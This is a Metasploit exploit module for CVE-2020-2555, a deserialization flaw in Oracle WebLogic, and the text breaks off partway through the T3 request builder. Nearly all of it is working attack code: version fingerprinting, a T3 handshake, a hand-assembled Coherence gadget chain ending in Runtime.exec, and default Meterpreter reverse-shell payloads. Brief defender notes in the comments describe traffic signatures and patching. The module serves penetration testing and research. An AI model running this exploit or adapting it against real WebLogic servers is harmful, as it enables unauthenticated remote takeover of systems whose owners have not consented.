WebLogic Server Deserialization Remote Code Execution Exploit
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit module for CVE-2020-2555 (Oracle WebLogic, Coherence gadget chain).
#
# Flow as implemented below: `check` fetches the console login page on RPORT and
# reads the "WebLogic Server Version:" banner into @version_no; `exploit` opens a
# raw TCP socket, sends a fixed T3 handshake, then a T3 request carrying a
# serialized javax.management.BadAttributeValueExpException whose chain goes
# through com.tangosol.util.filter.LimitFilter and the ChainedExtractor /
# ReflectionExtractor classes, ending in java.lang.Runtime.  The per-version
# SerialVersionUIDs, field counts and back-reference handles are selected from
# @version_no by the small helpers after build_payload_obj.
#
# Defender notes: on the wire this is a plaintext T3 hello ("t3 12.2.1 ...")
# followed by Java serialization streams (0xACED0005) on the WebLogic listen
# port, so it is visible to inspection of that port; exposure is removed by the
# vendor patch and by restricting T3/T3S reachability (e.g. WebLogic connection
# filters) to the hosts that need it.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Powershell
  include Msf::Exploit::Remote::AutoCheck

  # Module metadata and the single option (RPORT, default 7001 = WebLogic T3/HTTP).
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'WebLogic Server Deserialization RCE - BadAttributeValueExpException',
        'Description' => %q{
          There exists a Java object deserialization vulnerability in multiple versions of WebLogic.
          Unauthenticated remote code execution can be achieved by sending a serialized
          BadAttributeValueExpException object over the T3 protocol to vulnerable WebLogic servers.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Jang', # Vuln Discovery
          'Y4er', # PoC
          'Shelby Pace' # Metasploit Module
        ],
        'References' => [
          [ 'CVE', '2020-2555' ],
          [ 'URL', 'https://www.thezdi.com/blog/2020/3/5/cve-2020-2555-rce-through-a-deserialization-bug-in-oracles-weblogic-server' ],
          [ 'URL', 'https://github.com/Y4er/CVE-2020-2555' ]
        ],
        'Platform' => %w[unix linux win],
        'Arch' => [ ARCH_X86, ARCH_X64 ],
        'Privileged' => false,
        'Targets' => [
          [
            'Windows',
            {
              'Platform' => 'win',
              'Arch' => [ ARCH_X86, ARCH_X64 ],
              'DefaultOptions' => { 'Payload' => 'windows/meterpreter/reverse_tcp' }
            }
          ],
          [
            'Unix',
            {
              'Platform' => %w[unix linux],
              'CmdStagerFlavor' => 'printf',
              'Arch' => [ ARCH_X86, ARCH_X64 ],
              'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' }
            }
          ],
        ],
        'DisclosureDate' => '2020-01-15',
        'DefaultTarget' => 0
      )
    )

    register_options([ Opt::RPORT(7001) ])
  end

  # Fingerprints the target: requests the console login page over the raw socket
  # and matches the "WebLogic Server Version:" banner.  Sets @version_no, which
  # every version-dependent helper below reads.
  #
  # Returns CheckCode::Unknown when there is no response or no banner,
  # CheckCode::Appears when the parsed version is one of `versions`, and
  # CheckCode::Detected otherwise.  The socket is always closed via `ensure`.
  #
  # NOTE(review): a single get_once after a fixed 2 s sleep may return only the
  # first chunk of the page; if the banner arrives in a later read the check
  # reports Unknown rather than Appears — confirm against a slow target.
  def check
    connect
    web_req = "GET /console/login/LoginForm.jsp HTTP/1.1\nHost: #{peer}\n\n"
    sock.put(web_req)
    sleep(2)
    res = sock.get_once

    # Versions this module carries SerialVersionUIDs / handle offsets for.
    versions = [
      Gem::Version.new('12.1.3.0.0'),
      Gem::Version.new('12.2.1.3.0'),
      Gem::Version.new('12.2.1.4.0')
    ]

    return CheckCode::Unknown('Failed to obtain response from service') unless res

    # Regex literal on the left of =~ makes the named capture `version` a local.
    /WebLogic\s+Server\s+Version:\s+(?<version>\d+\.\d+\.\d+\.*\d*\.*\d*)/ =~ res
    return CheckCode::Unknown('Failed to detect WebLogic') unless version

    @version_no = Gem::Version.new(version)
    print_status("WebLogic version detected: #{@version_no}")
    return CheckCode::Appears if versions.include?(@version_no)

    CheckCode::Detected('Version of WebLogic is not vulnerable')
  ensure
    disconnect
  end

  # Entry point.  `super` goes to the AutoCheck mixin, which presumably runs
  # `check` first (that is what populates @version_no) — verify against the
  # mixin.  Then: fresh connection, T3 handshake, and either a PowerShell
  # one-liner wrapped by build_payload_obj (Windows target) or the CmdStager,
  # which calls execute_command below for each chunk.
  def exploit
    super
    connect
    print_status('Sending handshake...')
    t3_handshake

    if target.name == 'Windows'
      win_obj = cmd_psh_payload(payload.encoded, payload_instance.arch.first, { remove_comspec: true })
      win_obj.prepend('cmd.exe /c ')
      win_obj = build_payload_obj(win_obj)
      t3_send(win_obj)
    else
      execute_cmdstager
    end
  ensure
    disconnect
  end

  # Sends the fixed T3 client hello (decoded in the comments) and returns the
  # server's first reply.  The reply is not inspected by the caller.
  def t3_handshake
    # t3 12.2.1\nAS:255
    # \nHL:19\nMS:100000
    # 00\n\n
    shake = '74332031322e322e310a41533a323535'
    shake << '0a484c3a31390a4d533a313030303030'
    shake << '30300a0a'
    sock.put([shake].pack('H*'))
    sleep(1)
    sock.get_once
  end

  # Builds the serialized object as a lowercase hex string (not raw bytes; t3_send
  # packs it).  The stream is a BadAttributeValueExpException whose `val` is a
  # LimitFilter carrying a ChainedExtractor of three ReflectionExtractors
  # (getRuntime / getMethod / invoke), ending in the String[] produced by
  # format_payload(payload_data) and the java.lang.Runtime class.
  #
  # payload_data: command string; format_payload splits it into at most three
  # space-separated parts (see execute_command and the Windows branch of exploit).
  #
  # NOTE(review): everything version-specific here (limit_filter_uid,
  # chained_extractor_uid, abstract_extractor_uid, reflection_extractor_uid,
  # reflect_extract_count, add_sect, add_class_desc, add_tc_null, change_handle?)
  # keys off @version_no, which is only assigned in `check`.  If check did not
  # run, those helpers silently take their `else` branches.
  def build_payload_obj(payload_data)
    payload_obj = 'aced' # STREAM_MAGIC
    payload_obj << '0005' # STREAM_VERSION
    payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
    payload_obj << '002e' # Class name length: 46
    payload_obj << '6a617661782e6d616e61' # Class name: javax.management.BadAttributeValueExpException
    payload_obj << '67656d656e742e426164'
    payload_obj << '41747472696275746556'
    payload_obj << '616c7565457870457863'
    payload_obj << '657074696f6e'
    payload_obj << 'd4e7daab632d4640' # SerialVersionUID
    payload_obj << '020001' # Serialization flag, field num = 1
    payload_obj << '4c0003' # Field type code: 4c = Object, field name length: 3
    payload_obj << '76616c' # Field name: val
    payload_obj << '740012' # String, length: 18
    payload_obj << '4c6a6176612f6c616e672f4f626a6563743b' # Ljava/lang/Object;
    payload_obj << '7872' # end block data, TC_CLASSDESC
    payload_obj << '0013' # Class name length: 19
    payload_obj << '6a6176612e6c616e672e' # java.lang.Exception
    payload_obj << '457863657074696f6e'
    payload_obj << 'd0fd1f3e1a3b1cc4' # SerialVersionUID
    payload_obj << '020000' # Serializable, No fields
    payload_obj << '7872' # end block data, TC_CLASSDESC
    payload_obj << '0013' # Class name length: 19
    payload_obj << '6a6176612e6c616e672e' # java.lang.Throwable
    payload_obj << '5468726f7761626c65'
    payload_obj << 'd5c635273977b8cb' # SerialVersionUID
    payload_obj << '030004' # ?, then 4 fields
    payload_obj << '4c0005' # Field type: Object, field name length: 5
    payload_obj << '6361757365' # Field name: cause
    payload_obj << '740015' # String, length: 21
    payload_obj << '4c6a6176612f6c616e67' # Ljava/lang/Throwable;
    payload_obj << '2f5468726f7761626c653b'
    payload_obj << '4c000d' # Field type: Object, field name length: 13
    payload_obj << '64657461696c4d657373616765' # Field name: detailMessage
    payload_obj << '740012' # String, length: 18
    payload_obj << '4c6a6176612f6c616e67' # Ljava/lang/String;
    payload_obj << '2f537472696e673b'
    payload_obj << '5b000a' # Field type: 5b = array, field name length: 10
    payload_obj << '737461636b5472616365' # Field name: stackTrace
    payload_obj << '74001e' # String, length: 30
    payload_obj << '5b4c6a6176612f6c616e' # [Ljava/lang/StackTraceElement;
    payload_obj << '672f537461636b547261'
    payload_obj << '6365456c656d656e743b'
    payload_obj << '4c0014' # Field type: Object, field name length: 20
    payload_obj << '73757070726573736564' # Field name: suppressedExceptions
    payload_obj << '457863657074696f6e73'
    payload_obj << '740010' # String, length: 16
    payload_obj << '4c6a6176612f7574696c' # Ljava/util/List;
    payload_obj << '2f4c6973743b'
    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
    payload_obj << '71' # TC_REFERENCE
    payload_obj << '007e0008' # handle?
    payload_obj << '7075' # TC_NULL, TC_ARRAY
    payload_obj << '72001e' # TC_CLASSDESC, Class name length: 30
    payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.StackTraceElement;
    payload_obj << '672e537461636b547261'
    payload_obj << '6365456c656d656e743b'
    payload_obj << '02462a3c3cfd2239' # SerialVersionUID
    payload_obj << '020000' # Serializable, No fields
    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
    payload_obj << '00000001'
    payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
    payload_obj << '001b' # Class name length: 27
    payload_obj << '6a6176612e6c616e672e' # java.lang.StackTraceElement
    payload_obj << '537461636b5472616365'
    payload_obj << '456c656d656e74'
    payload_obj << '6109c59a2636dd85' # SerialVersionUID
    payload_obj << '020004' # Serializable, 4 fields
    payload_obj << '49000a' # Field type: 49 = Integer, field name length: 10
    payload_obj << '6c696e654e756d626572' # lineNumber
    payload_obj << '4c000e' # Field type: Object, field name length: 14
    payload_obj << '6465636c6172696e6743'
    payload_obj << '6c617373' # declaringClass
    payload_obj << '71' # TC_REFERENCE
    payload_obj << '007e0005' # handle
    payload_obj << '4c0008' # Field type: Object, field name length: 8
    payload_obj << '66696c654e616d65' # fileName
    payload_obj << '71' # TC_REFERENCE
    payload_obj << '007e0005' # handle
    payload_obj << '4c000a' # Field type: Object, field name length: 10
    payload_obj << '6d6574686f644e616d65' # methodName
    payload_obj << '71' # TC_REFERENCE
    payload_obj << '007e0005' # handle
    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
    payload_obj << '00000028'

    # The stack-trace element's class/file names are randomized per run so the
    # object differs between runs; the two-byte length prefixes are derived from
    # the same random name (+5 for the ".java" suffix appended below).
    class_name = Rex::Text.rand_text_alphanumeric(8..14)
    formatted_class = class_name.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join
    payload_obj << '74' # String
    payload_obj << class_name.length.to_s(16).rjust(4, '0')
    payload_obj << formatted_class # Originally Weblogic_2555 -> PoC class name
    payload_obj << '74' # String
    payload_obj << (class_name.length + 5).to_s(16).rjust(4, '0')
    payload_obj << formatted_class # Originally Weblogic_2555.java
    payload_obj << '2e6a617661' # .java
    payload_obj << '740004' # String, length: 4
    payload_obj << '6d61696e' # main
    payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
    payload_obj << '0026' # Class name length: 38
    payload_obj << '6a6176612e7574696c2e' # java.util.Collections$UnmodifiableList
    payload_obj << '436f6c6c656374696f6e'
    payload_obj << '7324556e6d6f64696669'
    payload_obj << '61626c654c697374'
    payload_obj << 'fc0f2531b5ec8e10' # SerialVersionUID
    payload_obj << '020001' # Serializable, 1 field
    payload_obj << '4c0004' # Field type: Object, field name length: 4
    payload_obj << '6c697374' # list
    payload_obj << '71' # TC_REFERENCE
    payload_obj << '007e0007' # handle
    payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
    payload_obj << '002c' # Class name length: 44
    payload_obj << '6a6176612e7574696c2e' # java.util.Collections$UnmodifiableCollection
    payload_obj << '436f6c6c656374696f6e'
    payload_obj << '7324556e6d6f64696669'
    payload_obj << '61626c65436f6c6c6563'
    payload_obj << '74696f6e'
    payload_obj << '19420080cb5ef71e' # SerialVersionUID
    payload_obj << '020001' # Serializable, 1 field
    payload_obj << '4c0001' # Field type: Object, field name length: 1
    payload_obj << '63' # Field name: c
    payload_obj << '740016' # String, length: 22
    payload_obj << '4c6a6176612f7574696c' # Ljava/util/Collection;
    payload_obj << '2f436f6c6c656374696f'
    payload_obj << '6e3b'
    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
    payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
    payload_obj << '0013' # Class name length: 19
    payload_obj << '6a6176612e7574696c2e' # java.util.ArrayList
    payload_obj << '41727261794c697374'
    payload_obj << '7881d21d99c7619d' # SerialVersionUID
    payload_obj << '030001' # ?, 1 field
    payload_obj << '490004' # Field type: Integer, field name length: 4
    payload_obj << '73697a65' # size
    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
    payload_obj << '00000000'
    payload_obj << '7704' # TC_BLOCKDATA, length: 4
    payload_obj << '00000000'
    payload_obj << '7871' # TC_ENDBLOCKDATA, TC_REFERENCE
    payload_obj << '007e0015' # handle
    payload_obj << '78' # TC_ENDBLOCKDATA
    payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
    payload_obj << '0024' # Class name length: 36
    payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.filter.LimitFilter
    payload_obj << '6f6c2e7574696c2e6669'
    payload_obj << '6c7465722e4c696d6974'
    payload_obj << '46696c746572'
    payload_obj << limit_filter_uid # SerialVersionUID (per-version, see helper)
    payload_obj << '020006' # Serializable, 6 fields
    payload_obj << '49000b' # Field type: Integer, field name length: 11
    payload_obj << '6d5f635061676553697a65' # m_cPageSize
    payload_obj << '490007' # Field type: Integer, field name length: 7
    payload_obj << '6d5f6e50616765' # m_nPage
    payload_obj << '4c000c' # Field type: Object, field name length: 12
    payload_obj << '6d5f636f6d70617261746f72' # m_comparator
    payload_obj << '740016' # String, length: 22
    payload_obj << '4c6a6176612f7574696c' # Ljava/util/Comparator;
    payload_obj << '2f436f6d70617261746f'
    payload_obj << '723b'
    payload_obj << '4c0008' # Field type: Object, field name length: 8
    payload_obj << '6d5f66696c746572' # m_filter
    payload_obj << '74001a' # String, length: 26
    payload_obj << '4c636f6d2f74616e676f' # Lcom/tangosol/util/Filter;
    payload_obj << '736f6c2f7574696c2f46'
    payload_obj << '696c7465723b'
    payload_obj << '4c000f' # Field type: Object, field name length: 15
    payload_obj << '6d5f6f416e63686f7242' # m_oAnchorBottom
    payload_obj << '6f74746f6d'
    payload_obj << '71' # TC_REFERENCE
    payload_obj << '007e0001' # handle
    payload_obj << '4c000c' # Field type: Object, field name length: 12
    payload_obj << '6d5f6f416e63686f72546f70' # m_oAnchorTop
    payload_obj << '71' # TC_REFERENCE
    payload_obj << '007e0001' # handle

    # 12.1.3.0.0 has no AbstractQueryRecorderFilter superclass descriptor.
    unless @version_no == Gem::Version.new('12.1.3.0.0')
      payload_obj << add_class_desc
    end

    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
    payload_obj << '00000000'
    payload_obj << '00000000'
    payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
    payload_obj << '002c' # Class name length: 44
    payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.ChainedExtractor
    payload_obj << '6f6c2e7574696c2e6578'
    payload_obj << '74726163746f722e4368'
    payload_obj << '61696e65644578747261'
    payload_obj << '63746f72'
    payload_obj << chained_extractor_uid # SerialVersionUID (per-version, see helper)
    payload_obj << '020000' # Serializable, no fields
    payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
    payload_obj << '0036' # Class name length: 54
    payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.AbstractCompositeExtractor
    payload_obj << '6f6c2e7574696c2e6578'
    payload_obj << '74726163746f722e4162'
    payload_obj << '737472616374436f6d70'
    payload_obj << '6f736974654578747261'
    payload_obj << '63746f72'
    payload_obj << '086b3d8c05690f44' # SerialVersionUID
    payload_obj << '020001' # Serializable, 1 field
    payload_obj << '5b000c' # Field type: Array, field name length: 12
    payload_obj << '6d5f61457874726163746f72' # m_aExtractor
    payload_obj << '740023' # String, length: 35
    payload_obj << '5b4c636f6d2f74616e67' # [Lcom/tangosol/util/ValueExtractor;
    payload_obj << '6f736f6c2f7574696c2f'
    payload_obj << '56616c75654578747261'
    payload_obj << '63746f723b'
    payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
    payload_obj << '002d' # Class name length: 45
    payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.AbstractExtractor
    payload_obj << '6f6c2e7574696c2e6578'
    payload_obj << '74726163746f722e4162'
    payload_obj << '73747261637445787472'
    payload_obj << '6163746f72'
    payload_obj << abstract_extractor_uid # SerialVersionUID (per-version, see helper)
    payload_obj << '020001' # Serializable, 1 field
    payload_obj << '490009' # Field type: Integer, field name length: 9
    payload_obj << '6d5f6e546172676574' # m_nTarget
    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
    payload_obj << '00000000'
    payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC
    payload_obj << '0032' # Class name length: 50
    payload_obj << '5b4c636f6d2e74616e67' # [Lcom.tangosol.util.extractor.ReflectionExtractor;
    payload_obj << '6f736f6c2e7574696c2e'
    payload_obj << '657874726163746f722e'
    payload_obj << '5265666c656374696f6e'
    payload_obj << '457874726163746f723b'
    payload_obj << 'dd8b89aed70273ca' # SerialVersionUID
    payload_obj << '020000' # Serializable, no fields
    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
    payload_obj << '00000003'
    payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
    payload_obj << '002f' # Class name length: 47
    payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.ReflectionExtractor
    payload_obj << '6f6c2e7574696c2e6578'
    payload_obj << '74726163746f722e5265'
    payload_obj << '666c656374696f6e4578'
    payload_obj << '74726163746f72'
    payload_obj << reflection_extractor_uid # SerialVersionUID (per-version, see helper)
    # Field count is split: the fixed '02000' prefix plus a one-digit count from
    # reflect_extract_count ('3' on 12.2.1.3.0 because of the extra
    # m_extractorCached field emitted by add_sect, else '2').
    payload_obj << '02000' # Serializable, variable fields orig: 020002
    payload_obj << reflect_extract_count
    payload_obj << '5b0009' # Field type: Array, field name length: 9
    payload_obj << '6d5f616f506172616d' # m_aoParam
    payload_obj << '740013' # String, length: 19
    payload_obj << '5b4c6a6176612f6c616e' # [Ljava/lang/Object;
    payload_obj << '672f4f626a6563743b'
    payload_obj << add_sect
    payload_obj << '4c0009' # Object, length: 9
    payload_obj << '6d5f734d6574686f64' # m_sMethod
    payload_obj << '71' # TC_REFERENCE
    payload_obj << '007e0005' # handle
    payload_obj << '7871' # TC_ENDBLOCKDATA, TC_REFERENCE
    # Back-reference handles are one lower on 12.1.3.0.0 (see change_handle?),
    # presumably because that version's stream has one fewer class descriptor.
    payload_obj << (change_handle? ? '007e001d' : '007e001e')
    payload_obj << '00000000'
    payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC
    payload_obj << '0013' # Class name length: 19
    payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.Object;
    payload_obj << '672e4f626a6563743b'
    payload_obj << '90ce589f1073296c' # SerialVersionUID
    payload_obj << '020000' # Serializable, no fields
    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
    payload_obj << '00000002'
    payload_obj << '74000a' # String, length: 10
    payload_obj << '67657452756e74696d65' # getRuntime
    payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC
    payload_obj << '0012' # Class name length: 18
    payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.Class;
    payload_obj << '672e436c6173733b'
    payload_obj << 'ab16d7aecbcd5a99' # SerialVersionUID
    payload_obj << '020000' # Serializable, no fields
    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
    payload_obj << '00000000'
    payload_obj << add_tc_null
    payload_obj << '740009' # String, length: 9
    payload_obj << '6765744d6574686f64' # getMethod
    payload_obj << '7371' # TC_OBJECT, TC_REFERENCE
    payload_obj << (change_handle? ? '007e0021' : '007e0022')
    payload_obj << '00000000'
    payload_obj << '7571' # TC_ARRAY, TC_REFERENCE
    payload_obj << (change_handle? ? '007e0024' : '007e0025')
    payload_obj << '00000002' # array size: 2
    payload_obj << '7075' # TC_NULL, TC_ARRAY
    payload_obj << '71' # TC_REFERENCE
    payload_obj << (change_handle? ? '007e0024' : '007e0025')
    payload_obj << '00000000'
    payload_obj << add_tc_null
    payload_obj << '740006' # TC_STRING, length: 6
    payload_obj << '696e766f6b65' # invoke
    payload_obj << '7371' # TC_OBJECT, TC_REFERENCE
    payload_obj << (change_handle? ? '007e0021' : '007e0022')
    payload_obj << '00000000'
    payload_obj << '7571' # TC_ARRAY, TC_REFERENCE
    payload_obj << (change_handle? ? '007e0024' : '007e0025')
    payload_obj << '00000001'
    payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC
    payload_obj << '0013' # Class name length: 19
    payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.String;
    payload_obj << '672e537472696e673b'
    payload_obj << 'add256e7e91d7b47' # SerialVersionUID
    payload_obj << '020000' # Serializable, no fields
    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
    payload_obj << '00000003' # String[] length: 3 — must match format_payload's split(' ', 3)

    payload_bin = format_payload(payload_data)
    payload_obj << payload_bin

    # Original data
    # ---------------------------
    # payload_obj << '740007' # String, length: 7
    # payload_obj << '2f62696e2f7368' # /bin/sh
    # payload_obj << '740002' # String, length: 2
    # payload_obj << '2d63' # -c
    # payload_obj << '740017' # String, length: 23
    # payload_obj << '746f756368202f746d70' # touch /tmp/blah_ze_blah
    # payload_obj << '2f626c61685f7a655f62'
    # payload_obj << '6c6168'
    # ---------------------------

    payload_obj << add_tc_null
    payload_obj << '740004' # String, length: 4
    payload_obj << '65786563' # exec
    payload_obj << '7070' # TC_NULL, TC_NULL
    payload_obj << '7672' # TC_CLASS, TC_CLASSDESC
    payload_obj << '0011' # Class name length: 17
    payload_obj << '6a6176612e6c616e672e' # java.lang.Runtime
    payload_obj << '52756e74696d65'
    payload_obj << '00000000000000000000'
    payload_obj << '00'
    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
  end

  # True only for 12.1.3.0.0, where the TC_REFERENCE handles in
  # build_payload_obj are shifted down by one.
  def change_handle?
    @version_no == Gem::Version.new('12.1.3.0.0')
  end

  # SerialVersionUID (hex) of com.tangosol.util.filter.LimitFilter for the
  # detected version; `else` covers 12.2.1.4.0 and any unrecognised value.
  def limit_filter_uid
    case @version_no
    when Gem::Version.new('12.1.3.0.0')
      '99022596d7b45953'
    when Gem::Version.new('12.2.1.3.0')
      'ab2901b976c4e271'
    else
      '954e4590be89865f'
    end
  end

  # SerialVersionUID (hex) of com.tangosol.util.extractor.ChainedExtractor.
  def chained_extractor_uid
    case @version_no
    when Gem::Version.new('12.1.3.0.0')
      '889f81b0945d5b7f'
    when Gem::Version.new('12.2.1.3.0')
      '06ee10433a4cc4b4'
    else
      '435b250b72f63db5'
    end
  end

  # SerialVersionUID (hex) of com.tangosol.util.extractor.AbstractExtractor.
  def abstract_extractor_uid
    case @version_no
    when Gem::Version.new('12.1.3.0.0')
      '658195303e723821'
    when Gem::Version.new('12.2.1.3.0')
      '752289ad4d460138'
    else
      '9b1be18ed70100e5'
    end
  end

  # SerialVersionUID (hex) of com.tangosol.util.extractor.ReflectionExtractor.
  def reflection_extractor_uid
    case @version_no
    when Gem::Version.new('12.1.3.0.0')
      'ee7ae995c02fb4a2'
    when Gem::Version.new('12.2.1.3.0')
      '87973791b26429dd'
    else
      '1f62f564b951b614'
    end
  end

  # Last hex digit of ReflectionExtractor's field count: 3 on 12.2.1.3.0
  # (extra m_extractorCached field, see add_sect), otherwise 2.
  def reflect_extract_count
    case @version_no
    when Gem::Version.new('12.2.1.3.0')
      '3'
    else
      '2'
    end
  end

  # Extra ReflectionExtractor field descriptor present only on 12.2.1.3.0;
  # empty string for every other version.
  def add_sect
    sect = ''
    if @version_no == Gem::Version.new('12.2.1.3.0')
      sect << '4c0011' # Object, length: 17
      sect << '6d5f657874726163746f' # m_extractorCached
      sect << '72436163686564'
      sect << '71' # TC_REFERENCE
      sect << '007e0001' # handle
    end
    sect
  end

  # Superclass descriptor for LimitFilter (AbstractQueryRecorderFilter), inserted
  # for every version except 12.1.3.0.0.  Returns the hex string (the last `<<`
  # is the method's value).
  def add_class_desc
    class_desc = ''
    class_desc << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
    class_desc << '0034' # Class name length: 52
    class_desc << '636f6d2e74616e676f73' # com.tangosol.util.filter.AbstractQueryRecorderFilter
    class_desc << '6f6c2e7574696c2e6669'
    class_desc << '6c7465722e4162737472'
    class_desc << '61637451756572795265'
    class_desc << '636f7264657246696c74'
    class_desc << '6572'
    class_desc << 'f3b98201f680eb90' # SerialVersionUID
    class_desc << '020000' # Serializable, no fields
  end

  # An extra TC_NULL byte that 12.2.1.3.0 streams carry before several entries;
  # empty string elsewhere.
  def add_tc_null
    return '70' if @version_no == Gem::Version.new('12.2.1.3.0')

    ''
  end

  # Wraps payload_obj (hex) in a T3 request: fixed framing and
  # weblogic.rjvm.ClassTableEntry / PeerInfo / VersionInfo / JVMID descriptors
  # copied from a captured request, with the serialized object spliced in after
  # the first 'fe010000' separator.  The leading 4-byte length field is patched
  # with the real byte count before sending; the send is fire-and-forget.
  #
  # NOTE(review): the JVMID host/name fields ("127.0.1.1", "us-l-breens") appear
  # to be fixed values from the original capture rather than the attacker's or
  # target's address — they are distinctive in traffic.
  def t3_send(payload_obj)
    print_status('Sending object...')
    request_obj = '000009f3' # Original packet length
    request_obj << '016501' # CMD_IDENTIFY_REQUEST, flags
    request_obj << 'ffffffffffffffff'
    request_obj << '00000071'
    request_obj << '0000ea60'
    request_obj << '00000018432ec6'
    request_obj << 'a2a63985b5af7d63e643'
    request_obj << '83f42a6d92c9e9af0f94'
    request_obj << '72027973720078720178'
    request_obj << '720278700000000c0000'
    request_obj << '00020000000000000000'
    request_obj << '00000001007070707070'
    request_obj << '700000000c0000000200'
    request_obj << '00000000000000000000'
    request_obj << '01007006'
    request_obj << 'fe010000' # separator
    request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
    request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
    request_obj << '001d' # Class name length: 29
    request_obj << '7765626c6f6769632e72' # weblogic.rjvm.ClassTableEntry
    request_obj << '6a766d2e436c61737354'
    request_obj << '61626c65456e747279'
    request_obj << '2f52658157f4f9ed' # SerialVersionUID
    request_obj << '0c0000' # flags?
    request_obj << '787072' # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC
    request_obj << '0024' # Class name length: 36
    request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PackageInfo
    request_obj << '6f6d6d6f6e2e696e7465'
    request_obj << '726e616c2e5061636b61'
    request_obj << '6765496e666f'
    request_obj << 'e6f723e7b8ae1ec9' # SerialVersionUID
    request_obj << '020009' # Serializable, 9 fields
    request_obj << '490005' # Field type: Int, field name length: 5
    request_obj << '6d616a6f72' # major
    request_obj << '490005' # Field type: Int, field name length: 5
    request_obj << '6d696e6f72' # minor
    request_obj << '49000b' # Field type: Int, field name length: 11
    request_obj << '70617463685570646174' # patchUpdate
    request_obj << '65'
    request_obj << '49000c' # Field type: Int, field name length: 12
    request_obj << '726f6c6c696e67506174' # rollingPatch
    request_obj << '6368'
    request_obj << '49000b' # Field type: Int, field name length: 11
    request_obj << '73657276696365506163' # servicePack
    request_obj << '6b'
    request_obj << '5a000e' # Field type: Z = Bool, field name length: 14
    request_obj << '74656d706f7261727950' # temporaryPatch
    request_obj << '61746368'
    request_obj << '4c0009' # Field type: Object, field name length: 9
    request_obj << '696d706c5469746c65' # implTitle
    request_obj << '740012' # String, length: 18
    request_obj << '4c6a6176612f6c616e67' # Ljava/lang/String;
    request_obj << '2f537472696e673b'
    request_obj << '4c000a' # Field type: Object, field name length: 10
    request_obj << '696d706c56656e646f72' # implVendor
    request_obj << '71007e0003' # TC_REFERENCE, handle
    request_obj << '4c000b' # Field type: Object, field name length: 11
    request_obj << '696d706c56657273696f6e' # implVersion
    request_obj << '71007e0003' # TC_REFERENCE, handle
    request_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
    request_obj << '7702' # TC_ENDBLOCKDATA
    request_obj << '000078'
    request_obj << 'fe010000' # separator
    request_obj << payload_obj # the serialized gadget object from build_payload_obj
    request_obj << 'fe010000' # separator
    request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
    request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
    request_obj << '001d' # Class name length: 29
    request_obj << '7765626c6f6769632e72' # weblogic.rjvm.ClassTableEntry
    request_obj << '6a766d2e436c61737354'
    request_obj << '61626c65456e747279'
    request_obj << '2f52658157f4f9ed' # SerialVersionUID
    request_obj << '0c0000'
    request_obj << '787072' # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC
    request_obj << '0021' # Class name length: 33
    request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PeerInfo
    request_obj << '6f6d6d6f6e2e696e7465'
    request_obj << '726e616c2e5065657249'
    request_obj << '6e666f'
    request_obj << '585474f39bc908f1' # SerialVersionUID
    request_obj << '020007' # Serializable, 7 fields
    request_obj << '490005' # Field type: Int, field name length: 5
    request_obj << '6d616a6f72' # major
    request_obj << '490005' # Field type: Int, field name length: 5
    request_obj << '6d696e6f72' # minor
    request_obj << '49000b' # Field type: Int, field name length: 11
    request_obj << '70617463685570646174' # patchUpdate
    request_obj << '65'
    request_obj << '49000c' # Field type: Int, field name length: 12
    request_obj << '726f6c6c696e67506174' # rollingPatch
    request_obj << '6368'
    request_obj << '49000b' # Field type: Int, field name length: 11
    request_obj << '73657276696365506163' # servicePack
    request_obj << '6b'
    request_obj << '5a000e' # Field type: Z = Bool, field name length: 14
    request_obj << '74656d706f7261727950' # temporaryPatch
    request_obj << '61746368'
